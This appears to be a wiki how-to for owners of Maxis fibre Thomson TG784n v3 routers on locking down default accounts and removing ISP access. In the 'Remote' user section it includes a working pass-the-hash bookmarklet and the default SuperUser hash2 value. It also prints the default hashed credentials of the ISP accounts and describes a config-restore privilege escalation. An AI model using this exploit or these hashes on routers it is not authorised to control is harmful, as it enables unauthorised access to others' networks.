Maxis Fiber Passwords

From znarl.jobrate.org
Jump to: navigation, search

This document will in no way assist with you breaking into Maxis connections illegally. These steps require physical access to perform. If you are looking for information on breaking into Maxis connections to steal bandwidth, please go somewhere else. Breaking into computer systems in Malaysia is illegal under the COMPUTER CRIMES ACT 1997

This document describes reconfiguring your Maxis router in your home only.

Default Accounts on the TG784n v3 Maxis Router

There are four accounts by default. They are:

  • MaxisBB Default low access account with no password.
  • Administrator Default access account, password is the ACCESS KEY
  • Remote Default remote administration account, end users don't normally have access to this account
  • tech Default technical support account, end users don't have normally have access to this account either

MaxisBB and Administrator accounts do not have full access to the router, only the Remote and tech accounts do.

These accounts are for accessing the Maxis router only

If you wish to change the password for Wifi, you need follow these steps. The Wifi password and the router accounts are different and control access to different things.

Adding a password to the “MaxisBB” account

Changing the MaxisBB account will not disable access for Maxis staff

Might want to create a Backup before making changes. If you forget your password and the backup restore doesn't work, you can always factory reset the router to restore it.

Maxis default configuration does not include a password. This means anyone using your wireless or wired network who goes to http://192.168.1.254 will have access to your Maxis Fibre Router. They can change your passwords, settings or break your internet, spy on you, install software on your systems without your permission, etc. The Router administration page can be accessed over WiFi as well as Ethernet.

It is a good idea to set a password for the “MaxisBB” account to prevent it being misused. If you in future forget the password, doing a factory reset will return the “MaxisBB” username to having no password.

  • Using your browser, go to
 http://192.168.1.254
  • Without entering any user names or passwords you will automaticly be logged as user “MaxisBB”.
  • Select in the top left hand corner "MaxisBB"
  • A dialogue box will appear about the MaxisBB account – select “Change password”.
  • The “Old Password” needs to be left empty, put in your password in “New Password” and “Confirm New Password” fields

caption

The Administrator account password that is the “ACCESS KEY” printed on a label on your Maxis Router. May be desirable to also change this password.

  • Again, using your browser, go to
 http://192.168.1.254
  • Login as MaxisBB with your new password
  • Select again in the top left hand corner "MaxisBB"
  • This time select “Switch to another user”.
  • Choose “Administrator” this time.
  • You will be asked for a password for the user account Administrator, enter the “ACCESS KEY” printed on the label on your router

Now every time you go to http://192.168.1.254 you will either need to login as MaxisBB or Administrator with your password. The user account Administrator has a high access level than MaxisBB.

Creating a new user with real administration powers

By gaining access to the Remote user, you can then create a real administrator account that allows configuration of the many advanced configurations. Below are details of the Remote user and using that user to increase your access and create a real administrator user you have access to.

Logging in as user "Remote"

Maxis routers come configured with different levels of administration access. A "MaxisBB" user account that has no password. A second account called "Remote" that home users do not have access to. A third account called "Administrator" with the password printed on a label on your Maxis router. The "Remote" account has a higher level of access than the MaxisBB and "Administrator" account and is required to change some of the settings on the Maxis router that the MaxisBB or "Administrator" account can not.

Changing the password of the "Remote" account and "Administrator" means you will be disabling Maxis staff access to your router, possibly a good thing. I am not sure if Maxis keeps records of customer "Administrator" passwords but it is possible and reasonable to expect they are.

Gaining access to the Remote user account and creating a real administration account

There is a security flaw in the TG784n V3 that allows the encrypted (MD5) password to be entered instead of the unencrypted password to gain access to the device with the "Remote" user. Once logged in as "Remote" the password can be changed for this user. Please note that Maxis at some point may change the "Remote" user password and may be different to the encrypted password below. You need to get the new "Remote" encrypted password by logging in to the Maxis router with the "MaxisBB" account and getting the new encrypted password. Easiest way to do this is by creating a backup of the TG784n V3 configuration and searching for "Remote" to discover the new MD5.

Credit go to forums.modem-help.co.uk for this information. (Website seems to be down as of time of writing.)

Please note that an update has been released by Thomson to address these weakness. Would be interested to know if Maxis has fixed this issue on their router with the new update.

Important, changing the "Remote" or "tech" user account will mean Maxis support staff can no longer access your Maxis router, this may be desirable, depending on your level of trust of Maxis staff.

This needs to be done connected to either the WiFi access point or Ethernet port. It can not be done remotely without knowing the WiFi password.

Go to the Maxis Router Change Password in a new window, normally does by clicking on the following link with the middle mouse button:

 http://192.168.1.254/ 

Highlight the following text completely

 javascript:(function(){var%20D=document;if(D.authform==undefined){alert("Are%20we%20on%20the%20same%20page?\nPlease%20open%20the%20routers%20login%20page%20and%20then%20run%20this%20bookmarklet!\nFor%20more%20info%20go%20to%20http://forums.modem-help.co.uk/viewtopic.php?t=1090");}else{var%20user,hash2;user=prompt("Give%20me%20the%20username!");if(user){var%20hash2=prompt("Can%20I%20have%20hash2%20value?");if(hash2){var%20HA2=MD5("GET"+":"+uri);D.getElementById("user").value=user;D.getElementById("hidepw").value=MD5(hash2+":"+nonce+":"+"00000001"+":"+"xyz"+":"+qop+":"+HA2);D.authform.submit();}else{alert("This%20won't%20work%20without%20correct%20input");}}}})();

Drag the highlighted javascript text to the tab of the new window opened with the Maxis User page. It will request a Username and password. Enter the following information:

 Username : Remote
 hash2 : 6e98f4d0679f0d4b3df3eb7452920daf

If successful, it will log you in as user Remote. Then it's simply a matter of creating a new username on the Maxis router of your choice with your own password.

Maxis Router User page

Screenshot of user administration

caption

Second way of gaining root access

There is a second way to gain access to the device:

  • Create a user with a low access level by with a known password.
  • Create a Backup,
  • Modify the backup configuration user.ini file and changing the users access you just created to the same as Remote.
  • Then doing a configuration restore with the modified user.ini configuration backup

More information how to do it can be found here

Account configuration defaults on Maxis Router

These are the default account configurations on the Maxis router. I removed the hashed passwords of MaxisBB and Administrator as they are none default.

 add name=MaxisBB password=_CYP2_[removed] role=User hash2=[removed] crypt=[removed] defuser=enabled
 add name=Administrator password=_CYP2_[removed] role=Administrator hash2=[changed] crypt=hyck3wklEXtyM
 add name=Remote password=_CYP2_337b3f6059e7b4cc5c88b8f71bbb34d6d42294e9bbe4d1d8 role=SuperUser hash2=6e98f4d0679f0d4b3df3eb7452920daf crypt=WREtaJ51l2Q0Y
 add name=tech password=_CYP2_05c817a3b379ef6d0d51259f4be6864b27d83d69743e09de role=TechnicalSupport hash2=fcf315201a5f40a26769142f3f32691f crypt=x7tuhJivLVO.M defremadmin=enabled

Disabling or removing this account stops Maxis from applying changes to route with or without your knowledge. Both are MD5 hashed passwords and could be brute forced by someone who cares enough.

The MD5 hash is created using the following string and shouldn't be difficult to find.

 "[username]:Thomson Gateway:[password]"

Disabling other Maxis Accounts on your router

This step removes ALL accounts and replaces them with your own account only. Doing a factory reset on your router will recover the accounts, as will restoring a backup

Login in to Telnet on the router

 telnet 192.168.1.254

Username: Administrator
Password: (<ACCESS KEY>) (on router label)

Screenshot of telneting into the router and entering the username and password

caption

Issue the following command:

 :user flush
 :user add name="my-user-name" password="my-password" role=SuperUser 
 :saveall

Logout.

Test your new account works by logging in to the web interface

 http://192.168.1.254

Login to your router with the username and password entered above to ensure you still have full control of the device.

Can then view which accounts exist using the web interface:

http://192.168.1.254/cgi/b/users/ov/?be=0&l0=3&l1=9

Screenshot of user administration

caption